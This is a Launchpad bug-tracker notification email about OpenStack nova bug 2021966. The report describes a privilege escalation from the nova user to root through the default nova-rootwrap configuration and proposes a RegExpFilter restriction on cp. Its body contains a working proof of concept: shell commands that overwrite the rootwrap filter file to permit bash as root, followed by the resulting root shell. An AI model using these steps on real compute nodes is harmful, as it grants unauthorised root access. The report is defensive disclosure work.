*** This bug is a duplicate of bug 1700501 ***
https://bugs.launchpad.net/bugs/1700501
Thanks Dan. I've switched the bug report to public and set the security
advisory task to "won't fix" (indicating there are no plans to issue a
security advisory covering this topic).
I'll also set it as a duplicate of bug 1700501, but if anyone disagrees
then it's easy to split back out.
** Information type changed from Private Security to Public
** Changed in: ossa
Status: Incomplete => Won't Fix
** This bug has been marked a duplicate of bug 1700501
Insecure rootwrap usage
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/2021966
Title:
Possible privilege escalation with nova-rootwrap
Status in OpenStack Compute (nova):
New
Status in OpenStack Security Advisory:
Won't Fix
Bug description:
This issue is being treated as a potential security risk under
embargo. Please do not make any public mention of embargoed
(private) security vulnerabilities before their coordinated
publication by the OpenStack Vulnerability Management Team in the
form of an official OpenStack Security Advisory. This includes
discussion of the bug or associated fixes in public forums such as
mailing lists, code review systems and bug trackers. Please also
avoid private disclosure to other individuals not already approved
for access to this information, and provide this same reminder to
those who are made aware of the issue prior to publication. All
discussion should remain confined to this private bug report, and
any proposed fixes should be added to the bug as attachments. This
embargo shall not extend past 2023-08-29 and will be made
public by or on that date even if no fix is identified.
Default nova-rootwrap configuration (up to Stein) allows easy
privilege escalation from user nova.
Description:
If attacker gains nova ssh key (for example from some backup), then can log
into nova account on compute node via ssh and easly escalate privileges to root:
[nova@compute ~]$ whoami
nova
[nova@compute ~]$ echo -e '[Filters]\nbash: CommandFilter, bash, root' >
compute.filters
[nova@compute ~]$ cat compute.filters
[Filters]
bash: CommandFilter, bash, root
[nova@compute ~]$
[nova@compute ~]$ sudo /usr/bin/nova-rootwrap /etc/nova/rootwrap.conf cp
/var/lib/nova/compute.filters /etc/nova/rootwrap.d/compute.filters
[nova@compute ~]$
[nova@compute ~]$ sudo /usr/bin/nova-rootwrap /etc/nova/rootwrap.conf bash
root@compute:~#
root@compute:~# whoami
root
Similar bug was reported some time ago:
https://bugs.launchpad.net/nova/+bug/1700501, but wasn't considered as
a real security risk (only local nova account login was discussed, not
remote connection).
Possible solution:
As number of 'write' commands executed as root is low, and used only in few
places in code, some limitations could be added. Simple example for command
'cp', with '/var/lib/nova/' as state_path:
cp: RegExpFilter, cp, root, cp, /var/lib/nova/.*, /var/lib/nova/.*
To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/2021966/+subscriptions
--
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help : https://help.launchpad.net/ListHelp
